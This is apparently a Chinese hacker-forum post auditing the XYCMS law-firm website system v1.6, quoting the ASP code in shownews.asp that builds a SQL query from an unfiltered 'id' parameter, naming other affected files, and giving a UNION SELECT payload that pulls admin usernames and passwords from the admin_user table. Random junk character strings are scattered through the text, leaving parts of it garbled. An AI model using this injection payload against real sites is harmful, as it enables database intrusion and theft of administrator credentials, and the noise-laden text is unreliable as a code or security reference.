前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
4 z: h& h# _- ?- ~0 `
- U' h* [0 Z$ X+ E9 o; i, q淫荡分割线, O+ g, F* w: L6 J1 s# }- d' h
--------------------------------------------------------
& D; C8 C9 t3 \7 t r % q6 _# R; v5 c0 h! R
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)) m' W' P( @/ L, C" k4 d
源码地址:http://down.chinaz.com/soft/29233.htm
" s, v% Q3 P, t
o; t z0 V7 W7 n5 v3 O' S+ N漏洞文件:shownews.asp
. @# A: B3 @+ r2 `: l" @. @漏洞代码:7-13行4 `$ k6 v% S7 A* H8 f- G$ w
9 I ?0 P) l/ Q7 i/ |5 o2 `/ N: X% b
; |8 {4 R" N3 t# ?<%
; E. f; U C+ w+ W. p Sid=request.QueryString("id")$ H+ X! N2 k* W a+ M
: |% k' k; H" p) ?6 C/ T5 {2 Qset snews=server.createobject("adodb.recordset") C0 _! H( [( B5 |
exec="select * from [news] where id="&id
) N5 V6 z* y) |, S$ r3 @% }# zsnews.open exec,conn,1,1- i- k8 f" o( r' p; Q( c" B
%>
' v1 k5 m' ~! d: U0 }- F0 a/ e 1 i& V8 {7 i- H1 y0 L0 p
" Y+ s5 F0 u. R/ N
什么过滤都没有 直造成注入) \* Z/ w7 z1 p7 ^- m# i
. B0 G h4 Z! A; e5 d; f注入点:http://127.0.0.1:99/shownews.asp?id=xx
) k/ \6 Y" R- B+ V+ P+ M% Y% q/ _ 3 K) m2 E" j9 S$ j+ F% C) _
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找8 c+ ]5 {' z. s3 ` X) q: f
: d" j* f7 J. N- M
; \! d* W$ @" B- E0 Mexp: union select 1,admin,password,4,5,7 from admin_user" T. A6 u c% n" B: P
# t: d! d( t- G* U8 ^) C
|